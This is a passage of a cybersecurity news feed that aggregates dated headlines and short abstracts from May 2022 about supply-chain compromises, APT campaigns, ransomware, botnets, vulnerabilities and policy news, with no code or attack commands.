PyPI module 'ctx' that gets downloaded over 20,000 times a week has been compromised in a software supply chain attack with malicious versions stealing the developer's environment variables. Additionally, versions of a 'phpass' fork published to the PHP/Composer package repository Packagist had been altered to steal secrets.BleepingComputer
May 23, 2022 – APT
Russia-linked Turla APT targets Austria, Estonia, and NATO platform Full Text
Abstract
Russia-linked APT group Turla was observed targeting the Austrian Economic Chamber, a NATO eLearning platform, and the Baltic Defense College. Researchers from SEKOIA.IO Threat & Detection Research (TDR) team have uncovered a reconnaissance...Security Affairs
May 23, 2022 – Attack
General Motors credential stuffing attack exposes car owners info Full Text
Abstract
US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed customer information and allowed hackers to redeem rewards points for gift cards.BleepingComputer
May 23, 2022 – Breach
GM credential stuffing attack exposed car owners’ personal info Full Text
Abstract
US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed customer information and allowed hackers to redeem rewards points for gift cards.BleepingComputer
May 23, 2022 – General
Blockchain bridge Wormhole pays record $10m bug bounty reward Full Text
Abstract
An attacker exploiting the vulnerability “could have held the entire protocol [to] ransom with the threat that the Ethereum Wormhole bridge would be bricked, and all the funds residing in that contract lost forever,” according to a PoC on GitHub.The Daily Swig
May 23, 2022 – General
Yes, Containers Are Terrific, But Watch the Security Risks Full Text
Abstract
Containers revolutionized the development process, acting as a cornerstone for DevOps initiatives, but containers bring complex security risks that are not always obvious. Organizations that don't mitigate these risks are vulnerable to attack. In this article, we outline how containers contributed to agile development, which unique security risks containers bring into the picture – and what organizations can do to secure containerized workloads, going beyond DevOps to achieve DevSecOps . Why did containers catch on so fast? Containers are, in many ways, the evolution of virtualization. The goal was to speed up the development process, creating a more agile route from development through to testing and implementation – a method that's more lightweight than using full-blown virtual machines, anyway. At the core of this issue is application compatibility, as applications require certain versions of libraries – which could clash with the requirements of other applications. ContainerThe Hacker News
May 23, 2022 – Botnet
Russia-linked Fronton botnet could run disinformation campaigns Full Text
Abstract
Researchers warn that the Fronton botnet was used by Russia-linked threat actors for coordinated disinformation campaigns. Fronton is a distributed denial-of-service (DDoS) botnet that was used by Russia-linked threat actors for coordinated disinformation...Security Affairs
May 23, 2022 – General
Cybercrime Getting More Sophisticated: How to Protect Your Business? Full Text
Abstract
Attackers continuously expand their capabilities and take advantage of limited cybersecurity awareness among businesses. With multiple attack vectors, they sabotage or bypass the victim’s security strengths while targeting their weaknesses. Hence it is more crucial than ever to have a Next-gen WAF.Threatpost
May 23, 2022 – Malware
Fake Windows exploits target infosec community with Cobalt Strike Full Text
Abstract
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.BleepingComputer
May 23, 2022 – Vulnerabilities
Yik Yak fixes information disclosure bug that leaked users’ GPS location Full Text
Abstract
‘Anonymous’ social network Yik Yak took more than three months to address vulnerabilities which meant it wasn’t anonymous at all, despite reports from two different security researchers.The Daily Swig
May 23, 2022 – Disinformation
Fronton: Russian IoT Botnet Designed to Run Social Media Disinformation Campaigns Full Text
Abstract
Fronton, a distributed denial-of-service (DDoS) botnet that came to light in March 2020, is much more powerful than previously thought, per the latest research. "Fronton is a system developed for coordinated inauthentic behavior on a massive scale," threat intelligence firm Nisos said in a report published last week. "This system includes a web-based dashboard known as SANA that enables a user to formulate and deploy trending social media events en masse. The system creates these events that it refers to as Инфоповоды, 'newsbreaks,' utilizing the botnet as a geographically distributed transport." The existence of Fronton, an IoT botnet, became public knowledge following revelations from BBC Russia and ZDNet in March 2020 after a Russian hacker group known as Digital Revolution published documents that it claimed were obtained after breaking into a subcontractor to the FSB, the Federal Security Service of the Russian Federation. Further investigatThe Hacker News
May 23, 2022 – Vulnerabilities
A flaw in PayPal can allow attackers to steal money from users’ account Full Text
Abstract
A security researcher announced the discovery of an unpatched flaw in PayPal that could allow attackers to steal money from users. TheHackerNews first reported that a security researcher (that goes online with the moniker h4x0r_dz) has discovered...Security Affairs
May 23, 2022 – Phishing
Photos of abused victims used in new ID verification scam Full Text
Abstract
Scammers are now leveraging dating apps like Tinder and Grindr to pose themselves as former victims of physical abuse to gain your trust and sympathy and sell you "ID verification" services. BleepingComputer came across multiple instances of users on online dating apps being approached by these catfishing profiles.BleepingComputer
May 23, 2022 – Government
South Korea and US agree to cooperate on combating North Korea’s cyber-offensives Full Text
Abstract
Last month, the US government offered a reward of up to $5 million for information to disrupt North Korea's cryptocurrency theft, cyber-espionage, and other illicit state-backed activities.The Register
May 23, 2022 – Vulnerabilities
New Unpatched Bug Could Let Attackers Steal Money from PayPal Users Full Text
Abstract
A security researcher claims to have discovered an unpatched vulnerability in PayPal's money transfer service that could allow attackers to trick victims into unknowingly completing attacker-directed transactions with a single click. Clickjacking, also called UI redressing, refers to a technique wherein an unwitting user is tricked into clicking seemingly innocuous webpage elements like buttons with the goal of downloading malware, redirecting to malicious websites, or disclosing sensitive information. This is typically achieved by displaying an invisible page or HTML element on top of the visible page, resulting in a scenario where users are fooled into thinking that they are clicking the legitimate page when they are in fact clicking the rogue element overlaid atop it. "Thus, the attacker is 'hijacking' clicks meant for [the legitimate] page and routing them to another page, most likely owned by another application, domain, or both," security researcher h4x0rThe Hacker News
May 23, 2022 – Privacy
Cytrox’s Predator spyware used zero-day exploits in 3 campaigns Full Text
Abstract
Google's Threat Analysis Group (TAG) uncovered campaigns targeting Android users with five zero-day vulnerabilities. Google's Threat Analysis Group (TAG) researchers discovered three campaigns, between August and October 2021, targeting Android users...Security Affairs
May 23, 2022 – General
Hackers can hack your online accounts before you even register them Full Text
Abstract
Security researchers have revealed that hackers can hijack your online accounts before you even register them by exploiting flaws that have already been fixed on popular websites, including Instagram, LinkedIn, Zoom, WordPress, and Dropbox.BleepingComputer
May 23, 2022 – Attack
Threat Actors Target the Infosec Community with Fake PoC Exploits Full Text
Abstract
An account was found sharing a fake Proof of Concept (POC) exploit code for an RPC Runtime Library Remote Code Execution flaw (CVE-2022-26809 CVSS 9.8). The malware, disguised as a fake PoC code, was available on GitHub.Security Affairs
May 23, 2022 – Hacker
Threat actors target the infoSec community with fake PoC exploits Full Text
Abstract
Researchers uncovered a malware campaign targeting the infoSec community with fake Proof Of Concept to deliver a Cobalt Strike beacon. Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infoSec community. The expert...Security Affairs
May 23, 2022 – Criminals
New RansomHouse group sets up extortion market, adds first victims Full Text
Abstract
Yet another data-extortion cybercrime operation has appeared on the darknet named 'RansomHouse' where threat actors publish evidence of stolen files and leak data of organizations that refuse to make a ransom payment.BleepingComputer
May 23, 2022 – Malware
Mirai Malware for Linux Double Down on Stronger Chips Full Text
Abstract
Popular for compromising internet-connected devices and conducting distributed denial of service (DDoS) attacks, Mirai malware variants have been known to compromise devices that run on Linux builds.Crowdstrike
May 23, 2022 – Attack
Russian hackers perform reconnaissance against Austria, Estonia Full Text
Abstract
In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College.BleepingComputer
May 22, 2022 – Criminals
Chinese “Twisted Panda” Hackers Caught Spying on Russian Defense Institutes Full Text
Abstract
At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed "Twisted Panda," come in the backdrop of Russia's military invasion of Ukraine, prompting a wide range of threat actors to swiftly adapt their campaigns to the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents. Israeli cybersecurity firm Check Point, which disclosed details of the latest intelligence-gathering operation, attributed it to a Chinese threat actor with connections to Stone Panda (aka APT 10, Cicada, or Potassium) and Mustang Panda (aka Bronze President, HoneyMyte, or RedDelta). CallinThe Hacker News
May 22, 2022 – Deepfake
Elon Musk deep fakes promote new BitVex cryptocurrency scam Full Text
Abstract
Cryptocurrency scammers are using deep fake videos of Elon Musk and other prominent cryptocurrency advocates to promote a BitVex trading platform scam that steals deposited currency.BleepingComputer
May 22, 2022 – Deepfake
Elon Musk deep fakes promote new cryptocurrency scam Full Text
Abstract
Cryptocurrency scammers are using deep fake videos of Elon Musk and other prominent cryptocurrency advocates to promote a BitVex trading platform scam that steals deposited currency.BleepingComputer
May 22, 2022 – General
Security Affairs newsletter Round 366 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
May 22, 2022 – Malware
PDF smuggles Microsoft Word doc to drop Snake Keylogger malware
Abstract
Threat analysts have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware. Source: BleepingComputer
May 22, 2022 – APT
North Korea-linked Lazarus APT uses Log4J to target VMware servers
Abstract
North Korea-linked Lazarus APT is exploiting the Log4J remote code execution (RCE) vulnerability in attacks aimed at VMware Horizon servers. North Korea-linked group Lazarus is exploiting the Log4J RCE vulnerability (CVE-2021-44228) to compromise VMware Horizon... Source: Security Affairs
May 22, 2022 – Privacy
Google: Predator spyware infected Android devices using zero-days
Abstract
Google's Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. Source: BleepingComputer
May 22, 2022 – General
The Pwn2Own Vancouver 2022: Trend Micro and ZDI awarded $1,155,000
Abstract
The Pwn2Own Vancouver 2022 hacking contest has ended, with Trend Micro and ZDI awarding a total of $1,155,000 for successful attempts! During the third day of the Pwn2Own Vancouver 2022 hacking competition, white hat hackers demonstrated a working exploit... Source: Security Affairs
May 21, 2022 – Criminals
New Details About Wizard Spider Emerge
Abstract
First detected in 2017, Wizard Spider has come a long way. A recent investigation by Prodaft revealed that the gang is one of the wealthiest, with assets exceeding hundreds of millions of dollars. Source: Cyware Alerts - Hacker News
May 21, 2022 – General
The Emergence of Physically Mediated Cyberattacks?
Abstract
Physical violence against personnel in lawless environments as an element of cyberattack is another dimension of cyber conflict, and its importance has been neglected for way too long. Source: Lawfare
May 21, 2022 – Policy and Law
India to press ahead with strict cybersecurity rules despite industry concerns
Abstract
Despite growing industry concerns, India will not change upcoming cybersecurity rules that force social media, technology companies, and cloud service providers to report data breaches swiftly. Source: The Indian Express
May 21, 2022 – Breach
Ransomware attack exposes data of 500,000 Chicago students
Abstract
Chicago Public Schools has suffered a massive data breach that exposed the data of almost 500,000 students and 60,000 employees after its vendor, Battelle for Kids, suffered a ransomware attack in December. Source: BleepingComputer
May 21, 2022 – Attack
Asian media company Nikkei suffered a ransomware attack
Abstract
The media company Nikkei has disclosed a ransomware attack and revealed that the incident might have impacted customer data. The Japan-based media company Nikkei, focused on the business and financial industry, is the world's largest financial... Source: Security Affairs
May 21, 2022 – Malware
Malicious PyPI package opens backdoors on Windows, Linux, and Macs
Abstract
Yet another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems. Source: BleepingComputer
May 21, 2022 – APT
Russia-linked Sandworm continues to conduct attacks against Ukraine
Abstract
Security researchers from ESET reported that the Russia-linked APT group Sandworm continues to target Ukraine. Security experts from ESET reported that the Russia-linked cyberespionage group Sandworm continues to launch cyber attacks against entities... Source: Security Affairs
May 21, 2022 – Vulnerabilities
Windows 11 hacked three more times on last day of Pwn2Own contest
Abstract
On the third and last day of the 2022 Pwn2Own Vancouver hacking contest, security researchers successfully hacked Microsoft's Windows 11 operating system three more times using zero-day exploits. Source: BleepingComputer
May 21, 2022 – Vulnerabilities
Cisco fixes an IOS XR flaw actively exploited in the wild
Abstract
Cisco has addressed a medium-severity vulnerability affecting IOS XR Software and warns that the flaw is actively exploited in the wild. Cisco released security updates to address a medium-severity vulnerability affecting IOS XR Software, tracked... Source: Security Affairs
May 21, 2022 – General
A year after report, task force urges U.S. to keep ransomware on front burner
Abstract
The federal government has made strides in deterring ransomware over the past year, but still has a number of milestones to reach, according to a new paper from the Institute for Security and Technology’s Ransomware Task Force. Source: CyberScoop
May 21, 2022 – Denial Of Service
The activity of the Linux XorDdos bot increased by 254% over the last six months
Abstract
XorDdos leverages persistence mechanisms, efficient evasion, and anti-forensic techniques, including obfuscating the malware’s activities, evading rule-based detection mechanisms, and hash-based malicious file lookup. Source: Security Affairs
May 21, 2022 – Vulnerabilities
QNAP warns of a new wave of DeadBolt ransomware attacks against its NAS devices
Abstract
Taiwanese vendor QNAP is asking users to install the latest update on their NAS devices and avoid exposing them on the Internet. The company issued the alert in response to a new wave of DeadBolt ransomware attacks targeting NAS devices. Source: Security Affairs
May 21, 2022 – Vulnerabilities
Microsoft’s out-of-band patch fixes Windows AD authentication failures
Abstract
Microsoft has released an out-of-band patch to fix authentication failures on Windows after installing the May 10, 2022 security update on Windows Server domain controllers. Source: ZDNet
May 20, 2022 – Ransomware
The Week in Ransomware - May 20th 2022 - Another one bites the dust
Abstract
Ransomware attacks continue to slow down, likely due to the invasion of Ukraine, instability in the region, and subsequent worldwide sanctions against Russia. Source: BleepingComputer
May 20, 2022 – Malware
Researchers Find Backdoor in School Management Plugin for WordPress
Abstract
Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites. The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity. The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up. School Management, developed by an India-based company called Weblizar, is billed as a WordPress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins. The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of t... Source: The Hacker News
May 20, 2022 – Attack
QNAP warns of a new wave of DeadBolt ransomware attacks against its NAS devices
Abstract
Taiwanese vendor QNAP warned customers of a new wave of DeadBolt ransomware attacks and urged them to install the latest updates. Taiwanese vendor QNAP is asking users to install the latest update on their NAS devices and avoid exposing them on the Internet. The... Source: Security Affairs
May 20, 2022 – General
Executives’ Personal Digital Lives are the Soft-Underbelly of Enterprise Security
Abstract
Cybercriminals are attacking executives and board members in their personal digital lives. This adds risk to the enterprise and is a problem that CISOs and security teams cannot solve on their own. Source: Threatpost
May 20, 2022 – Vulnerabilities
Cisco urges admins to patch IOS XR zero-day exploited in attacks
Abstract
Cisco has addressed a zero-day vulnerability in its IOS XR router software that allowed unauthenticated attackers to remotely gain access to Redis instances running in NOSi Docker containers. Source: BleepingComputer
May 20, 2022 – Vulnerabilities
Cisco Issues Patch for New IOS XR Zero-Day Vulnerability Exploited in the Wild
Abstract
Cisco on Friday rolled out fixes for a medium-severity vulnerability affecting IOS XR Software that it said has been exploited in real-world attacks. Tracked as CVE-2022-20821 (CVSS score: 6.5), the issue relates to an open port vulnerability that could be abused by an unauthenticated, remote attacker to connect to a Redis instance and achieve code execution. "A successful exploit could allow the attacker to write to the Redis in-memory database, write arbitrary files to the container filesystem, and retrieve information about the Redis database," Cisco said in an advisory. "Given the configuration of the sandboxed container that the Redis instance runs in, a remote attacker would be unable to execute remote code or abuse the integrity of the Cisco IOS XR Software host system." The flaw, which it said was identified during the resolution of a technical assistance center (TAC) case, impacts Cisco 8000 Series routers running IOS XR Software that has the health... Source: The Hacker News
May 20, 2022 – General
Pwn2Own Vancouver 2022 D2
Abstract
During the second day of the Pwn2Own Vancouver 2022 hacking competition, contestants demonstrated a working exploit for Microsoft Windows 11. During the second day of the Pwn2Own Vancouver 2022 hacking competition, white hat hackers demonstrated a working... Source: Security Affairs
May 20, 2022 – Malware
Backdoor baked into premium school management plugin for WordPress
Abstract
Security researchers have discovered a backdoor in a premium WordPress plugin built as a complete management solution for schools. The malicious code enables a threat actor to execute PHP code without authenticating. Source: BleepingComputer
May 20, 2022 – Malware
Microsoft Warns Rise in XorDdos Malware Targeting Linux Devices
Abstract
A Linux botnet malware known as XorDdos has witnessed a 254% surge in activity over the last six months, according to the latest research from Microsoft. The trojan, so named for its denial-of-service attacks on Linux systems and its use of XOR-based encryption for communications with its command-and-control (C2) server, is known to have been active since at least 2014. "XorDdos' modular nature provides attackers with a versatile trojan capable of infecting a variety of Linux system architectures," Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or of the Microsoft 365 Defender Research Team said in an exhaustive deep-dive of the malware. "Its SSH brute-force attacks are a relatively simple yet effective technique for gaining root access over a number of potential targets." Remote control over vulnerable IoT and other internet-connected devices is gained by means of secure shell (SSH) brute-force attacks, enabling the malware to form a botnet... Source: The Hacker News
May 20, 2022 – Attack
The activity of the Linux XorDdos bot increased by 254% over the last six months
Abstract
Microsoft researchers have observed a spike in the activity of the Linux bot XorDdos over the last six months. XorDdos, also known as XOR.DDoS, first appeared in the threat landscape in 2014; it is a Linux botnet that was employed in attacks... Source: Security Affairs
May 20, 2022 – Vulnerabilities
Windows 11 hacked again at Pwn2Own, Tesla Model 3 also falls
Abstract
During the second day of the Pwn2Own Vancouver 2022 hacking competition, contestants hacked Microsoft's Windows 11 OS again and demoed zero-days in the Tesla Model 3's infotainment system. Source: BleepingComputer
May 20, 2022 – Privacy
Cytrox’s Predator Spyware Targeted Android Users with Zero-Day Exploits
Abstract
Google's Threat Analysis Group (TAG) on Thursday pointed fingers at a North Macedonian spyware developer named Cytrox for developing exploits against five zero-day (aka 0-day) flaws, four in Chrome and one in Android, to target Android users. "The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched but not flagged as security issues and when these patches were fully deployed across the Android ecosystem," TAG researchers Clement Lecigne and Christian Resell said. Cytrox is alleged to have packaged the exploits and sold them to different government-backed actors located in Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain, and Indonesia, who, in turn, weaponized the bugs in at least three different campaigns. The commercial surveillance company is the maker of Predator, an implant analogous to that of NSO Group's Pegasus, and is known to hav... Source: The Hacker News
May 20, 2022 – General
Conti ransomware is shutting down operations, what will happen now?
Abstract
The Conti ransomware gang has shut down its operation, and some of its administrators have announced a rebranding of the gang. Advanced Intel researcher Yelisey Boguslavskiy announced that the Conti ransomware gang has shut down its infrastructure and some of its administrators... Source: Security Affairs
May 20, 2022 – Denial Of Service
Russian Sberbank says it’s facing massive waves of DDoS attacks
Abstract
Sberbank's vice president and director of cybersecurity, Sergei Lebed, has told participants of the Positive Hack Days forum that the company is going through a period of unprecedented targeting by hackers. Source: BleepingComputer
May 20, 2022 – Outage
K-12 school districts in New Mexico, Ohio crippled by cyberattacks
Abstract
This week, the Cl0p ransomware group’s leak site displayed sensitive information from students, faculty members, and parents from Fort Sumner Municipal Schools. The leak included scans of driver’s licenses and more. Source: The Record
May 20, 2022 – Attack
Researchers Uncover Rust Supply Chain Attack Targeting Cloud CI Pipelines
Abstract
A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware. Cybersecurity firm SentinelOne dubbed the attack "CrateDepression." Typosquatting attacks take place when an adversary mimics the name of a popular package on a public registry in hopes that developers will accidentally download the malicious package instead of the legitimate library. In this case, the crate in question is "rustdecimal," a typosquat of the real "rust_decimal" package that's been downloaded over 3.5 million times to date. The package was flagged earlier this month on May 3 by Askar Safin, a Moscow-based developer. According to an advisory published by the Rust maintainers, the crate is said to have been first pushed on March 25, 2022, attracting fewer than 500 downloads before it was permanently removed from the repository. Source: The Hacker News
May 20, 2022 – General
Canada bans Huawei and ZTE from 5G networks over security concerns
Abstract
The Government of Canada announced its intention to ban the use of Huawei and ZTE telecommunications equipment and services across the country's 5G and 4G networks. Source: BleepingComputer
May 20, 2022 – Malware
Dridex Infection Chain Case Studies
Abstract
During December 2021, Unit 42 researchers received various Dridex samples that abused XLL and XLM 4.0 in combination with Discord and OneDrive to download the final payload. Source: Palo Alto Networks
May 20, 2022 – Attack
Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor
Abstract
The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart. "The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report. The intrusions are said to have been first discovered in April, although multiple threat actors, including those aligned with China and Iran, have employed the same approach to further their objectives over the past few months. NukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle. Some of the key functions of the bac... Source: The Hacker News
May 20, 2022 – General
46% of organizations still store passwords in shared documents
Abstract
That’s despite an overwhelming 93% of respondents requiring password management training, with 63% holding training more than once per year, according to a survey conducted by Pulse on behalf of Hitachi ID. Source: Help Net Security
May 19, 2022 – Attack
Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware
Abstract
Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware. "The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network." Some of the rogue distribution vector domains, which were registered last month on April 20, include ms-win11[.]com, win11-serv[.]com, win11install[.]com, and ms-teams-app[.]net. In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware. The ISO file, for its part,... Source: The Hacker News
May 19, 2022 – Criminals
Conti ransomware shuts down operation, rebrands into smaller units
Abstract
The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more. Source: BleepingComputer
May 19, 2022 – Government
Legislation Promoting Cyber Collaboration Between DHS and States Awaits Biden Signature
Abstract
Having cleared the Senate in January, the State and Local Government Cybersecurity Act passed the House of Representatives Tuesday and now awaits President Joe Biden’s signature. Source: Nextgov
May 19, 2022 – Vulnerabilities
New Bluetooth Hack Could Let Attackers Remotely Unlock Smart Locks and Cars
Abstract
A novel Bluetooth relay attack can let cybercriminals remotely unlock and operate cars, break open residential smart locks, and breach secure areas more easily than ever. The vulnerability has to do with weaknesses in the current implementation of Bluetooth Low Energy (BLE), a wireless technology used for authenticating Bluetooth devices that are physically located within a close range. "An attacker can falsely indicate the proximity of Bluetooth LE (BLE) devices to one another through the use of a relay attack," U.K.-based cybersecurity company NCC Group said. "This may enable unauthorized access to devices in BLE-based proximity authentication systems." Relay attacks, also called two-thief attacks, are a variation of person-in-the-middle attacks in which an adversary intercepts communication between two parties, one of whom is also an attacker, and then relays it to the target device without any manipulation. While various mitigations have been implem... Source: The Hacker News
May 19, 2022 – General
Privacy Shield 2.0 — Third Time’s the Charm?
Abstract
What commitments has the United States made in the recent Trans-Atlantic Data Privacy Framework? And will those reforms be enough to pass muster when this next agreement goes before the Court of Justice for the European Union? Source: Lawfare
May 19, 2022 – Vulnerabilities
Google OAuth client library flaw allowed deployment of malicious payloads
Abstract
Google addressed a high-severity flaw in its OAuth client library for Java that could allow attackers with a compromised token to deploy malicious payloads. Google addressed a high-severity authentication bypass flaw in Google OAuth Client Library... Source: Security Affairs
May 19, 2022 – Attack
Media giant Nikkei’s Asian unit hit by ransomware attack
Abstract
Publishing giant Nikkei disclosed that the group's headquarters in Singapore was hit by a ransomware attack almost one week ago, on May 13th. Source: BleepingComputer
May 19, 2022 – Attack
Washington Local Schools hit with cyberattack
Abstract
The attack impacted the district's phones, email accounts, internet, WiFi networks, and Google Classroom. Currently, teachers do not have access to outgoing or incoming calls or emails. Source: WTOL
May 19, 2022 – General
7 Key Findings from the 2022 SaaS Security Survey Report
Abstract
The 2022 SaaS Security Survey Report, in collaboration with CSA, examines the state of SaaS security as seen through the eyes of CISOs and security professionals in today's enterprises. The report gathers anonymous responses from 340 CSA members to examine not only the growing risks in SaaS security but also how different organizations are currently working to secure themselves. Demographics: The majority (71%) of respondents were located in the Americas, another 17% in Asia, and 13% in EMEA. Of these participants, 49% influence the decision-making process while 39% run the process itself. The survey examined organizations from a variety of industries, such as telecommunications (25%), finance (22%), and government (9%). While there are many takeaways from the survey, these are our top seven. 1: SaaS Misconfigurations Are Leading to Security Incidents. Since 2019, SaaS misconfigurations have become a top concern for organizations, with at least 43% of organizations reporting... Source: The Hacker News
May 19, 2022 – General
Pwn2Own Vancouver 2022 D1: MS Teams exploits received $450,000
Abstract
White hat hackers earned a total of $800,000 on the first day of Pwn2Own Vancouver 2022, including $450,000 for exploits targeting Microsoft Teams. The Pwn2Own Vancouver 2022 hacking contest has begun; it is the 15th edition of this important event organized... Source: Security Affairs
May 19, 2022 – Malware
Microsoft detects massive surge in Linux XorDDoS malware activity
Abstract
A stealthy and modular malware used to hack into Linux devices and build a DDoS botnet has seen a massive 254% increase in activity during the last six months, as Microsoft revealed today. Source: BleepingComputer
May 19, 2022 – Government
Agencies Showcase Federal Cyber Progress, Outline Future Threats
Abstract
Lawmakers explored courses of action to help bolster and secure the federal government’s digital networks, primarily through ongoing security software implementation and steady federal funding to protect sensitive U.S. data. Source: Nextgov
May 19, 2022 – Vulnerabilities
High-Severity Bug Reported in Google’s OAuth Client Library for Java
Abstract
Google last month addressed a high-severity flaw in its OAuth client library for Java that could be abused by a malicious actor with a compromised token to deploy arbitrary payloads. Tracked as CVE-2021-22573, the vulnerability is rated 8.7 out of 10 for severity and relates to an authentication bypass in the library that stems from an improper verification of the cryptographic signature. Credited with discovering and reporting the flaw on March 12 is Tamjid Al Rahat, a fourth-year Ph.D. student of Computer Science at the University of Virginia, who has been awarded $5,000 as part of Google's bug bounty program. "The vulnerability is that the IDToken verifier does not verify if the token is properly signed," an advisory for the flaw reads. "Signature verification makes sure that the token's payload comes from a valid provider, not from someone else. An attacker can provide a compromised token with custom payload. The token will pass the validation on... Source: The Hacker News
May 19, 2022 – APT
China-linked Space Pirates APT targets the Russian aerospace industry
Abstract
A new China-linked cyberespionage group known as 'Space Pirates' is targeting enterprises in the Russian aerospace industry. A previously unknown Chinese cyberespionage group, tracked as 'Space Pirates', targets enterprises in the Russian aerospace... Source: Security Affairs
May 19, 2022 – Policy and Law
U.S. DOJ will no longer prosecute ethical hackers under CFAA
Abstract
The U.S. Department of Justice (DOJ) has announced a revision of its policy on how federal prosecutors should charge violations of the Computer Fraud and Abuse Act (CFAA), carving out "good-faith" security research from being prosecuted. Source: BleepingComputer
May 19, 2022 – Vulnerabilities
Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw
Abstract
A critical vulnerability in Flux2, the continuous delivery (CD) tool for Kubernetes, can enable rogue tenants in multi-tenancy deployments to sabotage ‘neighbors’ using the same off-premise infrastructure. Source: The Daily Swig
May 19, 2022 – Government
CISA orders federal agencies to fix VMware CVE-2022-22972 and CVE-2022-22973 flaws
Abstract
CISA orders federal agencies to fix VMware CVE-2022-22972 and CVE-2022-22973 vulnerabilities by May 23, 2022. The Cybersecurity and Infrastructure Security Agency (CISA) issued the Emergency Directive 22-03 to order federal agencies to fix VMware... Source: Security Affairs
May 19, 2022 – Hacker
Lazarus hackers target VMware servers with Log4Shell exploits
Abstract
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers. Source: BleepingComputer
May 19, 2022 – Vulnerabilities
Critical Flaws in Jupiter WordPress Plugin
Abstract
WordPress researchers unearthed a set of flaws in the Jupiter Theme and JupiterX Core plugins for the WordPress CMS, including a high-severity flaw that allows a third party to gain administrative privileges and completely take over a live site. Users are recommended to keep their machines up-to-da ... Source: Cyware Alerts - Hacker News
May 19, 2022 – Phishing
Phishing websites now use chatbots to steal your credentials
Abstract
Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to threat actors. Source: BleepingComputer
May 19, 2022 – Attack
New Wave of Brute-Force Attacks Targets SQL Servers - Microsoft Warns
Abstract
Microsoft uncovered a malicious campaign targeting SQL servers using a malware dubbed SuspSQLUsage. Attackers leverage a built-in PowerShell binary to achieve persistence on compromised systems. However, for initial compromise, they rely on brute-force tactics. It is recommended to monitor for ... Source: Cyware Alerts - Hacker News
May 19, 2022 – Breach
Microsoft Teams, Windows 11 hacked on first day of Pwn2Own
Abstract
During the first day of Pwn2Own Vancouver 2022, contestants won $800,000 after successfully exploiting 16 zero-day bugs to hack multiple products, including Microsoft's Windows 11 operating system and the Teams communication platform. Source: BleepingComputer
May 19, 2022 – Phishing
Phishers Add Chatbot to the Phishing Lure
Abstract
Researchers have discovered a new approach being taken by phishers to increase victim engagement and confidence: the addition of an interactive chatbot. The phishers hope that this will help lower the attention of the target victim. Source: Security Week
May 19, 2022 – Attack
QNAP alerts NAS customers of new DeadBolt ransomware attacks
Abstract
Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads. Source: BleepingComputer
May 19, 2022 – Botnet
Russia-linked Fronton Botnet Goes Beyond Just DDoS attacks at Scale
Abstract
An investigation into the Fronton botnet has revealed far more than the ability to perform DDoS attacks, with the exposure of coordinated inauthentic behavior "on a massive scale." Source: ZDNet
May 19, 2022 – Criminals
Ransomware gangs rely more on weaponizing vulnerabilities
Abstract
Security researchers are warning that external remote access services continue to be the main vector for ransomware gangs to breach company networks. Source: BleepingComputer
May 18, 2022 – Privacy
Web Trackers Caught Intercepting Online Forms Even Before Users Hit Submit
Abstract
